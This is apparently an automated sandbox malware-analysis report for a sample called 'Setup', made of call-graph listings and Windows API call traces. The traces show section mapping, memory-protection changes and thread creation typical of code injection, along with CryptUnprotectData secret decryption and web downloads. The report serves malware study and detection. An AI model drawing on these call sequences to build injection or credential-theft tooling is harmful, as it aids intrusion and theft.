79036 3199fac 79035->79036 79037 318fe80 42 API calls 79036->79037 79038 3199fd4 79037->79038 79039 318b460 42 API calls 79038->79039 79040 3199fe5 79039->79040 79041 31a71d0 48 API calls 79040->79041 79042 319a003 79041->79042 79043 3187ff0 40 API calls 79042->79043 79044 319a014 79043->79044 79045 318b460 42 API calls 79044->79045 79046 319a03f 79045->79046 79047 3184b60 42 API calls 79046->79047 79048 319a051 79047->79048 79049 3189a20 42 API calls 
79048->79049 79050 319a061 79049->79050 79051 31a6fc0 45 API calls 79050->79051 79052 319a072 79051->79052 79053 319a0b9 79052->79053 79054 319a08c NtQuerySystemInformation 79052->79054 79055 318b460 42 API calls 79053->79055 79054->79053 79056 319a092 79054->79056 79057 319a0a6 79055->79057 79058 3176900 42 API calls 79056->79058 79059 31a742b codecvt 5 API calls 79057->79059 79058->79057 79060 319a10e 79059->79060 79061 31cc149 79060->79061 79062 31cc15c __fread_nolock 79061->79062 79394 31c8b00 79062->79394 79064 31cc176 79408 31c2f3e 79064->79408 79068 318b460 42 API calls 79067->79068 79069 3199dc4 79068->79069 79070 3184b60 42 API calls 79069->79070 79071 3199dd6 79070->79071 79072 318fe80 42 API calls 79071->79072 79073 3199dfb 79072->79073 79074 318b460 42 API calls 79073->79074 79075 3199e09 79074->79075 79076 31a71d0 48 API calls 79075->79076 79077 3199e21 79076->79077 79078 3187ff0 40 API calls 79077->79078 79079 3199e2f 79078->79079 79080 318b460 42 API calls 79079->79080 79081 3199e57 79080->79081 79082 3184b60 42 API calls 79081->79082 79083 3199e69 79082->79083 79084 3189a20 42 API calls 79083->79084 79085 3199e79 79084->79085 79086 31a6fc0 45 API calls 79085->79086 79087 3199e8a 79086->79087 79088 3199ec9 79087->79088 79090 3199ea4 NtQuerySystemInformation 79087->79090 79089 318b460 42 API calls 79088->79089 79091 3199eb6 79089->79091 79090->79088 79092 3199eaa 79090->79092 79094 31a742b codecvt 5 API calls 79091->79094 79093 3176900 42 API calls 79092->79093 79093->79091 79095 3199f1e 79094->79095 79095->78337 79097 318b460 42 API calls 79096->79097 79098 3199600 79097->79098 79099 3184b60 42 API calls 79098->79099 79100 3199612 79099->79100 79101 318fe80 42 API calls 79100->79101 79102 3199640 79101->79102 79103 318b460 42 API calls 79102->79103 79104 3199651 79103->79104 79105 31a71d0 48 API calls 79104->79105 79106 3199672 79105->79106 79107 3187ff0 40 API calls 79106->79107 79108 3199683 79107->79108 79109 318b460 42 API calls 79108->79109 
79110 31996ae 79109->79110 79111 3184b60 42 API calls 79110->79111 79112 31996c0 79111->79112 79113 3189a20 42 API calls 79112->79113 79114 31996d3 79113->79114 79115 31a6fc0 45 API calls 79114->79115 79116 31996e4 79115->79116 79117 318b460 42 API calls 79116->79117 79118 3199711 79117->79118 79119 3184b60 42 API calls 79118->79119 79120 3199723 79119->79120 79121 318fe80 42 API calls 79120->79121 79122 3199751 79121->79122 79123 318b460 42 API calls 79122->79123 79124 3199762 LoadLibraryA 79123->79124 79126 3187ff0 40 API calls 79124->79126 79127 3199799 79126->79127 79128 318b460 42 API calls 79127->79128 79129 31997c4 79128->79129 79130 3184b60 42 API calls 79129->79130 79131 31997d6 79130->79131 79132 3189a20 42 API calls 79131->79132 79133 31997e9 79132->79133 79134 31a6fc0 45 API calls 79133->79134 79135 31997fa 79134->79135 79136 319984d 79135->79136 79142 319987f 79135->79142 79137 318b460 42 API calls 79136->79137 79151 319986c _Mpunct 79137->79151 79138 31a742b codecvt 5 API calls 79140 3199d4c 79138->79140 79139 319990b 79141 318b460 42 API calls 79139->79141 79140->78351 79162 319993c 79141->79162 79142->79139 79430 3196d20 42 API calls 4 library calls 79142->79430 79144 3199c5e 79147 3187ff0 40 API calls 79144->79147 79145 318b220 42 API calls 79145->79144 79146 3199bde 79148 3199bed __fread_nolock 79146->79148 79437 318bab0 42 API calls 5 library calls 79146->79437 79150 3199ce1 79147->79150 79148->79144 79148->79145 79150->79151 79152 3199d52 79150->79152 79151->79138 79438 31cc0b9 40 API calls 2 library calls 79152->79438 79156 31999f6 WideCharToMultiByte 79156->79162 79157 318b460 42 API calls 79157->79162 79159 318b220 42 API calls 79159->79162 79160 3185e00 42 API calls 79160->79162 79161 3187ff0 40 API calls 79161->79162 79162->79146 79162->79156 79162->79157 79162->79159 79162->79160 79162->79161 79163 3187f30 40 API calls 79162->79163 79431 318af50 42 API calls codecvt 79162->79431 79432 319b810 79162->79432 79163->79162 79165 31761bd 
79164->79165 79166 3176232 79165->79166 79440 31748f0 15 API calls 2 library calls 79165->79440 79166->78382 79168 3176225 79169 31c460e ___std_exception_destroy 14 API calls 79168->79169 79169->79166 79170 31761e8 79170->79168 79171 3176239 79170->79171 79172 31747a0 70 API calls 79170->79172 79171->78382 79172->79168 79174 319b810 42 API calls 79173->79174 79175 319b131 79174->79175 79175->78387 79177 31756e5 79176->79177 79183 31756fd 79176->79183 79178 31a742b codecvt 5 API calls 79177->79178 79180 31756f9 79178->79180 79179 3175c48 79181 31a742b codecvt 5 API calls 79179->79181 79180->78390 79182 3175c5e 79181->79182 79182->78390 79183->79179 79184 3175733 79183->79184 79185 31c460e ___std_exception_destroy 14 API calls 79183->79185 79184->79179 79186 3175757 79184->79186 79185->79184 79187 3175870 79186->79187 79190 3175761 79186->79190 79197 317577c 79187->79197 79441 3175000 79187->79441 79188 3175c27 79191 31a742b codecvt 5 API calls 79188->79191 79189 31c460e ___std_exception_destroy 14 API calls 79189->79188 79190->79197 79451 3173fc0 46 API calls codecvt 79190->79451 79193 3175c44 79191->79193 79193->78390 79195 317594c 79195->79197 79449 31c45a6 GetSystemTimeAsFileTime 79195->79449 79196 31757d5 79199 31a742b codecvt 5 API calls 79196->79199 79197->79188 79197->79189 79200 317586c 79199->79200 79200->78390 79201 31757c6 79201->79196 79201->79197 79203 31760ed 79202->79203 79204 31760da 79202->79204 79209 3176115 79203->79209 79210 317616b 79203->79210 79214 317614a 79203->79214 79205 31a742b codecvt 5 API calls 79204->79205 79206 31760e9 79205->79206 79206->78392 79207 31a742b codecvt 5 API calls 79208 3176167 79207->79208 79208->78392 79213 3176134 79209->79213 79209->79214 79211 317618c 79210->79211 79210->79214 79212 31a742b codecvt 5 API calls 79211->79212 79215 31761a0 79212->79215 79216 31a742b codecvt 5 API calls 79213->79216 79214->79207 79215->78392 79217 3176146 79216->79217 79217->78392 79219 3175c95 79218->79219 79226 3175cad 79218->79226 
79220 31a742b codecvt 5 API calls 79219->79220 79221 3175ca9 79220->79221 79221->78395 79222 3176090 79223 31a742b codecvt 5 API calls 79222->79223 79225 31760ad 79223->79225 79224 31c460e ___std_exception_destroy 14 API calls 79224->79222 79225->78395 79226->79222 79226->79224 79228 318b460 42 API calls 79227->79228 79229 3178e53 79228->79229 79230 3184b60 42 API calls 79229->79230 79231 3178e63 79230->79231 79232 318fe80 42 API calls 79231->79232 79233 3178e97 79232->79233 79234 318b460 42 API calls 79233->79234 79235 3178eae 79234->79235 79236 31a71d0 48 API calls 79235->79236 79237 3178ecc 79236->79237 79238 3187ff0 40 API calls 79237->79238 79239 3178edd 79238->79239 79240 318b460 42 API calls 79239->79240 79241 3178f08 79240->79241 79242 3184b60 42 API calls 79241->79242 79243 3178f18 79242->79243 79244 3189a20 42 API calls 79243->79244 79245 3178f2b 79244->79245 79246 31a6fc0 45 API calls 79245->79246 79247 3178f39 79246->79247 79248 318b460 42 API calls 79247->79248 79249 3178f66 79248->79249 79250 3184b60 42 API calls 79249->79250 79251 3178f76 79250->79251 79252 318fe80 42 API calls 79251->79252 79253 3178faa 79252->79253 79254 318b460 42 API calls 79253->79254 79255 3178fc1 79254->79255 79256 3187ff0 40 API calls 79255->79256 79257 3178ff5 79256->79257 79258 318b460 42 API calls 79257->79258 79259 3179020 79258->79259 79260 3184b60 42 API calls 79259->79260 79261 3179030 79260->79261 79262 3189a20 42 API calls 79261->79262 79263 3179043 79262->79263 79264 31a6fc0 45 API calls 79263->79264 79265 3179051 79264->79265 79266 318b460 42 API calls 79265->79266 79267 317907f 79266->79267 79268 3184b60 42 API calls 79267->79268 79269 317908f 79268->79269 79270 3189a20 42 API calls 79269->79270 79271 31790a2 79270->79271 79272 31a6fc0 45 API calls 79271->79272 79273 31790b0 79272->79273 79274 318b460 42 API calls 79273->79274 79275 31790de 79274->79275 79276 3184b60 42 API calls 79275->79276 79277 31790ee 79276->79277 79278 3189a20 42 API calls 79277->79278 79279 
3179101 79278->79279 79280 31a6fc0 45 API calls 79279->79280 79281 317910f 79280->79281 79282 318b460 42 API calls 79281->79282 79283 317913d 79282->79283 79284 3184b60 42 API calls 79283->79284 79285 317914d 79284->79285 79286 3189a20 42 API calls 79285->79286 79287 3179160 79286->79287 79288 31a6fc0 45 API calls 79287->79288 79289 317916e 79288->79289 79290 318b460 42 API calls 79289->79290 79291 317919c 79290->79291 79292 3184b60 42 API calls 79291->79292 79293 31791ac 79292->79293 79294 3189a20 42 API calls 79293->79294 79295 31791bf 79294->79295 79296 31a6fc0 45 API calls 79295->79296 79297 31791cd 79296->79297 79298 318b460 42 API calls 79297->79298 79299 31791fb 79298->79299 79300 3184b60 42 API calls 79299->79300 79301 317920b 79300->79301 79302 3189a20 42 API calls 79301->79302 79303 317921e 79302->79303 79304 31a6fc0 45 API calls 79303->79304 79305 317922c 79304->79305 79306 318b460 42 API calls 79305->79306 79307 317925a 79306->79307 79308 3184b60 42 API calls 79307->79308 79309 317926a 79308->79309 79310 3189a20 42 API calls 79309->79310 79311 317927d 79310->79311 79312 31a6fc0 45 API calls 79311->79312 79313 317928b 79312->79313 79314 31889a0 42 API calls 79313->79314 79315 31792a0 79314->79315 79316 31a742b codecvt 5 API calls 79315->79316 79317 31792b7 79316->79317 79317->78418 79318 3175670 79317->79318 79452 31750f0 79318->79452 79320 31756b6 79320->78425 79321 3175681 79321->79320 79474 31c41d0 40 API calls 2 library calls 79321->79474 79323 31756ab 79475 31c3228 67 API calls __fread_nolock 79323->79475 79326 31747bf 79325->79326 79328 317485c 79325->79328 79326->79328 79477 31c3b96 70 API calls __fread_nolock 79326->79477 79329 3173ea0 79328->79329 79330 3173ebf 79329->79330 79332 3173f55 79329->79332 79330->79332 79478 31c3b96 70 API calls __fread_nolock 79330->79478 79333 31c460e 79332->79333 79334 31d258e ___std_exception_destroy 14 API calls 79333->79334 79335 31c4626 79334->79335 79335->78418 79342 3179555 79336->79342 79337 3179850 79338 
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02DC19C0
                                                                                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,00000000), ref: 02DC1A68
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02DC1DDC
                                                                                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02DC1E91
                                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02DC1EAE
                                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02DC1F51
                                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02DC1F84
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02DC20F5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1248616170-0
                                                                                                                                                                                                                                                      • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                      • Instruction ID: dccda390fbd2f071829eb4281f0c930e820bc10a6b81dd90939eb67cba6562ea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B425871608312AFDB24CF18C884B6AB7E9EF88714F24492DF9899B352D770ED45CB51

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • NtCreateFile.NTDLL ref: 031A5433
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 031A5459
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 031A5463
                                                                                                                                                                                                                                                      • NtReadFile.NTDLL ref: 031A5493
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileHeap$AllocateByteCharConcurrency::cancel_current_taskCreateMultiProcessReadWide
                                                                                                                                                                                                                                                      • String ID: @$\??\
                                                                                                                                                                                                                                                      • API String ID: 1712409946-506726239
                                                                                                                                                                                                                                                      • Opcode ID: 1e87682ebac4e653913148dd98786dc147e418ac2e22002ef15604ac563f903e
                                                                                                                                                                                                                                                      • Instruction ID: 8cb7ef6c459c97163e9d451c4243f3454b13e38b861fb77ea5a28f4b03d9b1e0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e87682ebac4e653913148dd98786dc147e418ac2e22002ef15604ac563f903e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3716A74D00348EFDB10EFA8C905BDEBBB8EF49704F204159E514AB281EB755A49CBA1

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,031F6C58,00000003,00000000), ref: 0319A80D
                                                                                                                                                                                                                                                        • Part of subcall function 03199F30: NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,031F6BE8,00000002), ref: 0319A08C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,00000000,?,?,031F6C9C,00000003,?,?,?,?,?,?,?,?,00000004), ref: 0319B395
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: System$ByteCharConcurrency::cancel_current_taskInfoInformationMultiNativeQuerySleepWide
                                                                                                                                                                                                                                                      • String ID: 1735337711$D$barni
                                                                                                                                                                                                                                                      • API String ID: 3676425750-3739948360
                                                                                                                                                                                                                                                      • Opcode ID: b98bc542e1c2090474dcec0bc49d30024d80da32ade725a76ced121807c54271
                                                                                                                                                                                                                                                      • Instruction ID: 873e9d6e94f0a48efa95836875108b835f3a7259bdbf9c6fa56ffc1e519ed2ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98bc542e1c2090474dcec0bc49d30024d80da32ade725a76ced121807c54271
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00A27974D0539CDBDB15EBA8C8447DDBBB0AF5A304F2482C9D4486B282DB745B89CF92

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?), ref: 0317BC9B
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0317BCDD
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 0317BCE7
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0317BD30
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0317BD37
                                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32 ref: 0317BDD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocateCryptDataFreeUnprotectlstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 112277046-0

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000002), ref: 0317A1DA
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0317A1EC
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0317A1F8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                                                                      • String ID: ?$D
                                                                                                                                                                                                                                                      • API String ID: 2922976086-1345265552

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0317A2E9
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 0317A32C
                                                                                                                                                                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000008,00000000,?), ref: 0317A366
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0317A396
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(?,00000000,00000000), ref: 0317A3A6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Allocate$ErrorFreeLastProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1125902347-0

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32 ref: 0318237C
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskFileFindFirst
                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                      • API String ID: 2840147243-2657877971

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02D205BD,?,00000001,?,81EC8B55,000000FF), ref: 02D20AB5
• Thread32First.KERNEL32(00000000,0000001C), ref: 02D20AE1
• Wow64SuspendThread.KERNEL32(00000000), ref: 02D20B34
• CloseHandle.KERNEL32(00000000), ref: 02D20B5E
• Thread32Next.KERNEL32(00000000,0000001C), ref: 02D20B76
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: Thread32$CloseCreateFirstHandleNextSnapshotSuspendThreadToolhelp32Wow64
• String ID:
• API String ID: 915977163-0

APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02D2060A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: WYVK$sR8
• API String ID: 2422867632-1046787239

APIs
  • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
• NtQueryAttributesFile.NTDLL ref: 03182B25
Strings
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: AttributesByteCharFileMultiQueryWide
• String ID: @$\??\
• API String ID: 4261815757-506726239

APIs
  • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
  • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
• InternetOpenUrlA.WININET ref: 0319E086
• InternetReadFile.WININET ref: 0319E0EA
• InternetReadFile.WININET ref: 0319E136
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: Internet$FileRead$ByteCharConcurrency::cancel_current_taskMultiOpenWide
• String ID:
• API String ID: 3525159475-0
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02D209F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: ,
• API String ID: 2422867632-3772416878
APIs
  • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
  • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
• LoadLibraryA.KERNEL32 ref: 03199786
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: ByteCharConcurrency::cancel_current_taskLibraryLoadMultiWide
• String ID:
• API String ID: 1730022097-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                        • Part of subcall function 031A5070: SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,03205040), ref: 031A50C2
                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32 ref: 03182E31
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AttributesConcurrency::cancel_current_taskFileFolderPath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 325715954-0
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                                                      • API String ID: 3859560861-1255198513
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D258E: RtlFreeHeap.NTDLL(00000000,00000000,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25A4
                                                                                                                                                                                                                                                        • Part of subcall function 031D258E: GetLastError.KERNEL32(?,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25AF
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,031D5105,00000000,00000000,00000000), ref: 031D4FC4
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3335090040-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,031F6BE8,00000002), ref: 0319A08C
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskInformationMultiQuerySystemWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2924814847-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,031F6BD8,00000002), ref: 03199EA4
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskInformationMultiQuerySystemWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2924814847-0

Control-flow Graph
[Graph rendering not reproduced; first node at 317a8d0. Legend: Executed / Not Executed]
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004,03205040,00000000,00000010,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8), ref: 0317A920
                                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317A965
                                                                                                                                                                                                                                                      • GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000000,00000000), ref: 0317A987
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC), ref: 0317A999
                                                                                                                                                                                                                                                      • GetExtendedTcpTable.IPHLPAPI(00000000,00000000,00000000,00000002,00000000,00000000), ref: 0317A9C0
                                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?), ref: 0317A9F3
                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,031F7934,00000010,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317AA2B
                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(-00000019,031F7950,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317AA44
